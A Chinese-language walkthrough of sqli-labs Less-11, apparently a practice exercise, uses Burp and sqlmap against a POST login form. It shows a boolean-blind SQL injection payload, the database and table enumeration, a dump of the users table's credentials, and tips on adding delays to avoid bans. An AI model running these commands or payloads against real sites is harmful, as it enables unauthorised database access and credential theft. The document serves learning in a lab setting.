题目
从第11less开始,就是POST表单了
burp抓取数据包
将抓取到的数据包存放到桌面,保存为post.txt
数据包内容如下:
POST /Less-11/ HTTP/1.1
Host: 223.112.39.132:44537
Content-Length: 39
Cache-Control: max-age=0
Accept-Language: zh-CN,zh;q=0.9
Origin: http://223.112.39.132:44537
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://223.112.39.132:44537/Less-11/
Accept-Encoding: gzip, deflate, br
Cookie: td_cookie=3853948853
Connection: keep-aliveuname=admin&passwd=123456&submit=Submit
执行sqlmap查询当前数据库名称
sqlmap -r post.txt --batch --current-db --dbms=mysql --level=3 --risk=2 --technique=B
参数说明
-
batch:自动化模式,自动选择所有默认选项
-
dbms=mysql:明确目标数据库类型,显著加快检测速度
-
level=3:检测等级提升(包含Referer/Cookie等头部检测)
-
risk=2:中等风险注入技术(平衡成功率和触发WAF的风险)
-
technique=B:优先使用布尔盲注(对POST表单最有效)
-
flush-session:清除缓存确保全新检测
预期输出
┌──(kali㉿kali)-[~/Desktop]
└─$ sqlmap -r post.txt --batch --current-db --dbms=mysql --level=3 --risk=2 --technique=B_____H_____ ___[)]_____ ___ ___ {1.9.4#stable}
|_ -| . [(] | .'| . |
|___|_ [)]_|_|_|__,| _||_|V... |_| https://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting @ 09:43:14 /2025-07-20/[09:43:14] [INFO] parsing HTTP request from 'post.txt'
[09:43:14] [INFO] testing connection to the target URL
[09:43:14] [INFO] checking if the target is protected by some kind of WAF/IPS
[09:43:15] [INFO] testing if the target URL content is stable
[09:43:15] [INFO] target URL content is stable
[09:43:15] [INFO] testing if POST parameter 'uname' is dynamic
[09:43:15] [WARNING] POST parameter 'uname' does not appear to be dynamic
[09:43:16] [INFO] heuristic (basic) test shows that POST parameter 'uname' might be injectable (possible DBMS: 'MySQL')
[09:43:16] [INFO] heuristic (XSS) test shows that POST parameter 'uname' might be vulnerable to cross-site scripting (XSS) attacks
[09:43:16] [INFO] testing for SQL injection on POST parameter 'uname'
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (3) and risk (2) values? [Y/n] Y
[09:43:16] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[09:43:18] [WARNING] reflective value(s) found and filtering out
[09:43:28] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (subquery - comment)'
[09:43:35] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (comment)'
[09:43:38] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[09:43:39] [INFO] testing 'Boolean-based blind - Parameter replace (DUAL)'
[09:43:39] [INFO] testing 'Boolean-based blind - Parameter replace (DUAL - original value)'
[09:43:39] [INFO] testing 'Boolean-based blind - Parameter replace (CASE)'
[09:43:39] [INFO] testing 'Boolean-based blind - Parameter replace (CASE - original value)'
[09:43:39] [INFO] testing 'HAVING boolean-based blind - WHERE, GROUP BY clause'
[09:43:48] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[09:43:58] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[09:44:07] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'
[09:44:11] [INFO] POST parameter 'uname' appears to be 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)' injectable (with --not-string="Your")
[09:44:11] [WARNING] in OR boolean-based injection cases, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval
[09:44:11] [INFO] checking if the injection point on POST parameter 'uname' is a false positive
POST parameter 'uname' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 263 HTTP(s) requests:
---
Parameter: uname (POST)Type: boolean-based blindTitle: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)Payload: uname=admin%' OR NOT 3611=3611#&passwd=123456&submit=Submit
---
[09:44:15] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.23, PHP 5.6.28
back-end DBMS: MySQL (MariaDB fork)
[09:44:16] [INFO] fetching current database
[09:44:16] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[09:44:16] [INFO] retrieved: security
current database: 'security'
[09:44:29] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/223.112.39.132'[*] ending @ 09:44:29 /2025-07-20/要获取 security 库中的表名和 users 表的数据,请使用以下完整指令:
获取 security 库的所有表名
sqlmap -r post.txt --batch --dbms=mysql -D security --tables
参数说明
-D security:指定目标数据库名称--tables:列出数据库中的所有表
预期输出
┌──(kali㉿kali)-[~/Desktop]
└─$ sqlmap -r post.txt --batch --dbms=mysql -D security --tables_____H_____ ___[(]_____ ___ ___ {1.9.4#stable}
|_ -| . [(] | .'| . |
|___|_ [)]_|_|_|__,| _||_|V... |_| https://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting @ 09:51:49 /2025-07-20/[09:51:49] [INFO] parsing HTTP request from 'post.txt'
[09:51:50] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: uname (POST)Type: boolean-based blindTitle: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)Payload: uname=admin%' OR NOT 3611=3611#&passwd=123456&submit=Submit
---
[09:51:50] [INFO] testing MySQL
[09:51:50] [INFO] confirming MySQL
[09:51:50] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.23, PHP 5.6.28
back-end DBMS: MySQL >= 8.0.0 (MariaDB fork)
[09:51:50] [INFO] fetching tables for database: 'security'
[09:51:50] [INFO] fetching number of tables for database 'security'
[09:51:50] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[09:51:50] [INFO] retrieved: 4
[09:51:50] [INFO] retrieved: emails
[09:51:53] [INFO] retrieved: referers
[09:51:56] [INFO] retrieved: uagents
[09:51:59] [INFO] retrieved: users
Database: security
[4 tables]
+----------+
| emails |
| referers |
| uagents |
| users |
+----------+[09:52:01] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/223.112.39.132'[*] ending @ 09:52:01 /2025-07-20/获取 users 表的所有数据
sqlmap -r post.txt --batch --dbms=mysql -D security -T users --dump
参数说明
-T users:指定目标表名--dump:导出整个表的数据
预期输出
┌──(kali㉿kali)-[~/Desktop]
└─$ sqlmap -r post.txt --batch --dbms=mysql -D security -T users --dump_____H_____ ___[.]_____ ___ ___ {1.9.4#stable}
|_ -| . [)] | .'| . |
|___|_ [,]_|_|_|__,| _||_|V... |_| https://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting @ 09:52:03 /2025-07-20/[09:52:03] [INFO] parsing HTTP request from 'post.txt'
[09:52:03] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: uname (POST)Type: boolean-based blindTitle: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)Payload: uname=admin%' OR NOT 3611=3611#&passwd=123456&submit=Submit
---
[09:52:03] [INFO] testing MySQL
[09:52:03] [INFO] confirming MySQL
[09:52:03] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.23, PHP 5.6.28
back-end DBMS: MySQL >= 8.0.0 (MariaDB fork)
[09:52:03] [INFO] fetching columns for table 'users' in database 'security'
[09:52:03] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[09:52:03] [INFO] retrieved: 3
[09:52:03] [INFO] retrieved: id
[09:52:04] [INFO] retrieved: username
[09:52:08] [INFO] retrieved: password
[09:52:11] [INFO] fetching entries for table 'users' in database 'security'
[09:52:11] [INFO] fetching number of entries for table 'users' in database 'security'
[09:52:11] [INFO] retrieved: 8
[09:52:11] [INFO] retrieved: 1
[09:52:11] [INFO] retrieved: Dumb
[09:52:13] [INFO] retrieved: Dumb
[09:52:15] [INFO] retrieved: 2
[09:52:16] [INFO] retrieved: I-kill-you
[09:52:20] [INFO] retrieved: Angelina
[09:52:23] [INFO] retrieved: 3
[09:52:24] [INFO] retrieved: p@ssword
[09:52:27] [INFO] retrieved: Dummy
[09:52:29] [INFO] retrieved: 4
[09:52:30] [INFO] retrieved: crappy
[09:52:32] [INFO] retrieved: secure
[09:52:35] [INFO] retrieved: 5
[09:52:35] [INFO] retrieved: stupidity
[09:52:39] [INFO] retrieved: stupid
[09:52:41] [INFO] retrieved: 6
[09:52:42] [INFO] retrieved: genious
[09:52:45] [INFO] retrieved: superman
[09:52:48] [INFO] retrieved: 7
[09:52:49] [INFO] retrieved: mob!le
[09:52:51] [INFO] retrieved: batman
[09:52:54] [INFO] retrieved: 8
[09:52:54] [INFO] retrieved: admin
[09:52:57] [INFO] retrieved: admin
Database: security
Table: users
[8 entries]
+----+------------+----------+
| id | password | username |
+----+------------+----------+
| 1 | Dumb | Dumb |
| 2 | I-kill-you | Angelina |
| 3 | p@ssword | Dummy |
| 4 | crappy | secure |
| 5 | stupidity | stupid |
| 6 | genious | superman |
| 7 | mob!le | batman |
| 8 | admin | admin |
+----+------------+----------+[09:52:59] [INFO] table '`security`.users' dumped to CSV file '/home/kali/.local/share/sqlmap/output/223.112.39.132/dump/security/users.csv'
[09:52:59] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/223.112.39.132'[*] ending @ 09:52:59 /2025-07-20/分步获取(适合大表)
(1) 先获取表结构:
sqlmap -r post.txt --batch -D security -T users --columns
(2) 按需导出指定列:
sqlmap -r post.txt --batch -D security -T users \-C id,username,password \ # 指定要导出的列--dump
重要注意事项:
- 数据量较大时:添加
--limit=100限制每次查询行数 - 避免被封禁:添加延时参数
--delay=2(2秒/请求) - 结果保存:使用
--output-dir=report生成完整报告 - HTTPS目标:在 Host 头后添加
:443端口
Less11也可以使用sqlmap进行解决
